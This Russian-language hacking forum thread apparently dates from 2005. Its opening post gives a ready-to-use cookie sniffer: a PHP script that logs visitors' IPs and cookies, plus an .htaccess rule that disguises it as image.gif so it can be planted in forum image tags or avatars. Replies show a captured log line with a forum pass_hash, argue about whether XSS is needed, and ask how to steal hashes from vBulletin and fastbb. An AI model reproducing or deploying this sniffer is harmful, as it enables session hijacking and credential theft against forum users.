Воруем хэш! Подходит для всех форумов. 1. Регимся на jino-net.ru 2. Загружаем туда файлы : image.gif sniff.php .htaccess log.txt Image.gif - любое изображение. Sniff.php должен быть след. содержания: PHP: <? $log="log.txt"; $file = fopen ($log, "a+"); $qu=UrlDecode(getenv('QUERY_STRING')); $ref=UrlDecode(getenv('HTTP_REFERER')); $ip=getenv('REMOTE_ADDR'); $brow=getenv('HTTP_USER_AGENT'); $upc=getenv('REMOTE_HOST'); $cookie=getenv('HTTP_COOKIE'); $now = getdate(); $nowstring=$now['mday'].".".$now['mon'].".".$now['year']." ".$now['hours'].":".$now['minutes'].":".$now['seconds']; $str="[$nowstring] IP=$ip Cookie=$cookie Browser=$brow REFERER=$ref QUERY=$qu\n"; fputs ($file, $str); fclose($file); header('Location: image.gif'); ?> .htaccess такого содержания: Code: RewriteEngine On RewriteRule image.gif sniff.php Далее пишем на форуме: в тэге IMG пишем линк к image.gif На log.txt ставин chmod 777 и всё! Куки у нас!
Да ты просто гений! )))) Правда это работает так же как и снифак на ачате... но эт неважно! А сказать прикол? кроме реферера ничего к тебе не придёт! там должна быть хсс что сразу отметает из 100% 90% =))))
Вот что пришло: Code: [29.10.2005 23:54:16] IP=[COLOR=Red]xxxxxxx [/COLOR]Cookie=bbmode=0; anonlogin=-1; member_id=2; pass_hash=65ab52b200fdcc7f2c80d60bb1cc9bff; forum_read=a%3A1%3A%7Bi%3A2%3Bi%3A1130599467%3B%7D Browser=Opera/8.50 (Windows NT 5.1; U; ru) REFERER=http://[COLOR=Red]xxxxxxxxxxxxxxxx [/COLOR]QUERY=
2degeneration x: хз. там понимаешь штука со снифаком какая - когда ты его запихиваешь например в <IMG> тебе необходимо(для получения куксов) прикреплять ещё и document.cookie это можно сделать только с помощью хсс! Ну сам подумай так бы все сайты ломались
Это один из многих способов... Если на форуме можно дать линк на свою аватару, то проблемм нет. А вот если идёт прямая загрузка, то жопа(
kolorom, нет... Kond4r имел ввиду када ты можеш в профиле указать линк на твой аватар. имхо. $ZLO$, жжош! а отчего хеш то хоть?
2 страницы бреда. Куки будут только с того домена, на котором находится картинка!!! В данном случае с сайта, на котором и лежит наша картинки, ну и рефер, что ничего не даст, конечно если повезет, то даст сессию
Green_Bear, давно хотел спросить-помню ты давал какому-то челу совет по взлому fastbb путем xss с аватарой. Так вот как ты говоришь, "Куки будут только с того домена, на котором находится картинка!!!" .Да, это так, в чем я не раз убеждался. Тогда как можно взломать этой xss fastbb, если там аватары загружаются на сервер borda?
А как спереть хеш от vBulletin 3.5.0??? Пытался увести с помошью сниффера как описано, но куки не приходят.